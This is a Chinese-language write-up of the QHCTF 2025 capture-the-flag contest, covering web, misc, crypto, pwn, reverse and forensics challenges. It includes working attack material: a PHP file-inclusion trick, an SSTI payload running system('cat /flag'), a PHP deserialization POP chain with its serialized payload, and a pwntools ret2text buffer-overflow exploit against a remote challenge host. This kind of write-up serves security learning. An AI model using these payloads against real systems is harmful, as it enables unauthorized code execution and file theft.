web

Easy_include

<?php
error_reporting(0);
//flag in flag.php
$file=$_GET['file'];
if(isset($file))
{
    if(!preg_match("/flag/i",$file))
    {
        include($file);
    }
    else
    {
        echo("no no no ~ ");
    }
}
else
{
    highlight_file(__FILE__);
}

?>

代码审计,直接使用input伪协议,修改为POST包

image-20250125100721650

Web_IP

在hint页面发现提示

image-20250125100059996

因此尝试在flag页面伪造本地IP

image-20250125100157940

发现没有结果,尝试进行ssti漏洞

image-20250125100339260

发现可以注入,直接尝试{system('cat /flag')},结果直接获得flag

image-20250125100520369

Web_pop

反序列化

<?php
class Start{
    public $name;
    public $func;
}
 
class Sec{
    public $obj;
    public $var;
}
 
class Easy{
    public $cla;
}
 
class eeee{
    public $obj;
}
$a=new Start();
$b=new Sec();
$c=new Easy();
$d=new eeee();
$e=new Start();
$f=new Sec();
$a->name=$b;
$b->obj=$c;
$c->cla=$d;
$b->var=$d;
$d->obj=$e;
$e->func=$f;
echo serialize($a);
//O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";O:4:"eeee":1:{s:3:"obj";O:5:"Start":2:{s:4:"name";N;s:4:"func";O:3:"Sec":2:{s:3:"obj";N;s:3:"var";N;}}}}s:3:"var";r:4;}s:4:"func";N;}

image-20250125151503417

misc

QHCTF For Year 2025

没思路,但是在看到数字长短不一后,尝试在日历上找到相对应的数字连接即为flag

image-20250125101237578

PvzHE

发现修改日期不同,果断查看每个文件夹中较近修改日期的,找到flag

image-20250125121802539

image-20250125121751775

请找出拍摄地所在位置

直接根据广告牌上网搜

flag:QHCTF{广西壮族自治区柳州市柳城县六广路与榕泉路交叉口}

crypto

Easy_RSA

直接写解密脚本

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64

# 定义私钥和公钥
private_key = b'''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCmAm1LDBO/9naD21Cv+2IAIM45QFKUtMEmHE5urTxVFR+7wT6i
t8UycoEV+2h9n4uSLRwR9XgG78KefyzNQNJD2sCO6CxkXlnkONLQYtU1AUB8bqSQ
qvT+ifVz3JhYPDo1co8ZXYJn69/UidN+7IblB07vPuZS9QncD/o4RvhU4wIDAQAB
AoGAFpS87hjh9NofC9eAtbdhgLf1pTb5JK4jmb3+8zIQQ1iAvQbPsM2DftWxdl6A
u5nAn+0P5Od5YKQrWmjdHLxE/WpkL3yPqBkdK36yW5COL+QB2iEJ2pngKupouXcD
DQ7rE7h0tLl76hdDhM1+1JbI1ffldokL4BJTB6c7TpPR3MkCQQC3baP4h7M+zoxB
dZHQ8Q4+0BsvYFviFmEpaG4WVUmXKg5VqfFUyrQFje4I2+3sbx9EgHhSKXBxtDJP
ihpIdRGLAkEA57CKG9l0jP4Q4WoEHk+2pEsSfkIbFyjTfhx7tZ6td2nC0SBzzJC3
hv1l4PcMDO5/oHLCCNNsqoCGNOM4rukFCQJBAJQw1R9N6sdcMb4U0SiAB6VBliTx
cWo38Gl2wDH0145z4L7enGWHmmc+Ykfv/slcgWNjc1HVvs1t6pOOHGvbgL8CQEgr
J3nxTGq2oQ919H50mhGnCMWnVcTrBKXdvXMfUC1IFlUJ5Mgts90qhVeD3I8So1KZ
LHOPV+PsUOGcfYWOM/ECQE57g32MZRhCNcaiTJG2qDX20fkJkAfvDTGMP2K14Sx0
iqDIvd4z4gJDq448arl1V0qgFFuu0uODYThZNVYw2Sk=
-----END RSA PRIVATE KEY-----'''

encrypted_message = "GAR7osCii7r02QmOzsvRs1vf/5Z0Eb/U7gBya2T0koE48uTPy6yMxOoYOIlkT1tAs3IPdhQaV0dsJ0TkYP5ZcDXE0/bxZbsj2sB9pINaRtS3oeKIG4Tr9yJ353UnBZVrsy+Urb6OqKeR6t/PgxbW8yiunAdAOOwEKPtTZCIXeBM="

def decrypt_message(encrypted_message, private_key):
    # 导入私钥
    key = RSA.import_key(private_key)
    cipher = PKCS1_OAEP.new(key)
    
    # 解码Base64编码的消息并解密
    decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))
    return decrypted_message.decode('utf-8')

try:
    decrypted = decrypt_message(encrypted_message, private_key)
    print("解密后的消息:")
    print(decrypted)
except Exception as e:
    print("解密失败:", str(e))

image-20250125153733577

pwn

Easy_pwn

有后门函数,明显栈溢出漏洞,ret2text思路直接做

from pwn import *
context(arch='amd64',os = 'Linux')
#io = process("./pwn")
elf=ELF("./pwn")
io=remote('challenge.qihangcup.cn',35149)
ret=0x401016

shellcode = elf.sym['secret']
payload = b'a'*(0x50)+p64(0)+p64(ret)+p64(shellcode)

io.sendline(payload)

io.interactive()

Re

Checker

简单的xor

#include <iostream>
#include <vector>
using namespace std;

int main() {
    // 加密数据
    unsigned char enc[43] = {
        0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46, 0x15, 0x40, 0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46,
        0x14, 0x45, 0x16, 0x0E, 0x17, 0x45, 0x42, 0x41, 0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E, 0x46, 0x42,
        0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15, 0x42, 0x16, 0x5E
    };

    // 解密后的数据
    vector<int> flag(43);

    // 解密过程
    for (int i = 0; i < 43; i++) {
        flag[i] = enc[i] ^ 0x23;
        cout << static_cast<char>(flag[i]);
    }

    cout << endl;

    return 0;
}

rainbow

给了一个XOR加密的密文。密文是十六进制字符串,每两个字符表示一个字节。

尝试写脚本爆破密钥,最后爆出密钥为0x5A

encrypted_flag_hex = "0B12190E1C213B6268686C6B6A69776F3B633B776E3C3B6D773B38393C773E3F3B6E69623B6D393F6D6227"
encrypted_flag = bytes.fromhex(encrypted_flag_hex)

def xor_decrypt(data, key):
    return ''.join(chr(b ^ key) for b in data)

# 尝试所有可能的单字节密钥
for key in range(256):
    decrypted = xor_decrypt(encrypted_flag, key)
    print(f"Key: {key:02X}, Decrypted: {decrypted}")

Forensics

Win_01

在黑客文件夹下找到向开始菜单中插入的Server2.exe文件分析,放进奇安信沙盒中发现IP及端口

image-20250126001238069

image-20250125234845397

md5加密获得flag:QHCTF{ad4fdee2eada36ec3c20e9d6311cf258}

Win_02

先找到user文件夹,找到下列的HackY$,这就是用户名,密码在远程连接中可以找到,为123456,连起来为HackY$_123456

flag为QHCTF{fb484ad326c0f3a4970d1352bfbafef8}

Win_07

先提取一个flag.zip的文件,但是发现要密码,并且提示在环境变量中

image-20250126002231636

直接在user用户找环境变量中密码

image-20250126002901524

打开文件解压后base64解码获得flag

image-20250126003020776